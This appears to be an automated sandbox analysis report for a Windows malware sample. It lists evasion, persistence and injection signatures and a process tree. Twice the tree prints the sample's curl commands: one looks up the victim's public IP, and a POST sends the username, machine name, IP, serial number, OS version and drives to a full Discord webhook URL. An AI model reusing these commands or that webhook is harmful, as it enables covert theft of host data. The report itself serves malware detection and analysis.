Edit tour
Windows
Analysis Report
Jx6bD8nM4qW9sL3v.exe
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Exploit detected, runtime environment starts unknown processes
Sigma detected: Suspicious Processes Spawned by Java.EXE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Jx6bD8nM4qW9sL3v.exe (PID: 6052 cmdline:
"C:\Users\ user\Deskt op\Jx6bD8n M4qW9sL3v. exe" MD5: E181EB699888D8BBBE0B89D41DF77678) - conhost.exe (PID: 3060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6604 cmdline:
C:\Windows \system32\ cmd.exe /c curl -s h ttps://api .ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 5776 cmdline:
curl -s ht tps://api. ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - curl.exe (PID: 4196 cmdline:
curl -H "C ontent-Typ e: applica tion/json" -X POST - d "{\"embe ds\":[{\"c olor\":167 11680,\"fi elds\":[{\ "inline\": false,\"na me\":\"loc al user\", \"value\": \"user\"}, {\"inline\ ":false,\" name\":\"s ystem name \",\"value \":\"57134 5\"},{\"in line\":fal se,\"name\ ":\"ip add ress\",\"v alue\":\"8 .46.123.18 9\"},{\"in line\":fal se,\"name\ ":\"serial number\", \"value\": \"C6553AFB \"},{\"inl ine\":fals e,\"name\" :\"product version\" ,\"value\" :\"Windows 6.2 (Buil d 9200)\"} ,{\"inline \":false,\ "name\":\" Drives\",\ "value\":\ "C: (Local ) D: (CD-R OM)\"}],\" footer\":{ \"text\":\ "New clien t\"},\"tim estamp\":\ "2024-12-3 0T11:32:25 .000Z\"}]} " https:// discord.co m/api/webh ooks/13213 2860279246 0330/Q9CQM UqhPmnLA8Y CGFiWcN1qs md8SzEzHV5 RcFrIuYx8U WU2bSG3fdw 4gr1C7AVhJ Qhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- java.exe (PID: 6400 cmdline:
C:\Users\u ser\AppDat a\Local\ja va.exe MD5: E181EB699888D8BBBE0B89D41DF77678) - conhost.exe (PID: 5000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1812 cmdline:
C:\Windows \system32\ cmd.exe /c curl -s h ttps://api .ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 4144 cmdline:
curl -s ht tps://api. ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - curl.exe (PID: 3128 cmdline:
curl -H "C ontent-Typ e: applica tion/json" -X POST - d "{\"embe ds\":[{\"c olor\":167 11680,\"fi elds\":[{\ "inline\": false,\"na me\":\"loc al user\", \"value\": \"user\"}, {\"inline\ ":false,\" name\":\"s ystem name \",\"value \":\"57134 5\"},{\"in line\":fal se,\"name\ ":\"ip add ress\",\"v alue\":\"8 .46.123.18 9\"},{\"in line\":fal se,\"name\ ":\"serial number\", \"value\": \"C6553AFB \"},{\"inl ine\":fals e,\"name\" :\"product version\" ,\"value\" :\"Windows 6.2 (Buil d 9200)\"} ,{\"inline \":false,\ "name\":\" Drives\",\ "value\":\ "C: (Local ) D: (CD-R OM)\"}],\" footer\":{ \"text\":\ "New clien t\"},\"tim estamp\":\ "2024-12-3 0T11:32:27 .000Z\"}]} " https:// discord.co m/api/webh ooks/13213 2860279246 0330/Q9CQM UqhPmnLA8Y CGFiWcN1qs md8SzEzHV5 RcFrIuYx8U WU2bSG3fdw 4gr1C7AVhJ Qhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Andreas Hunkeler (@Karneades), Florian Roth: |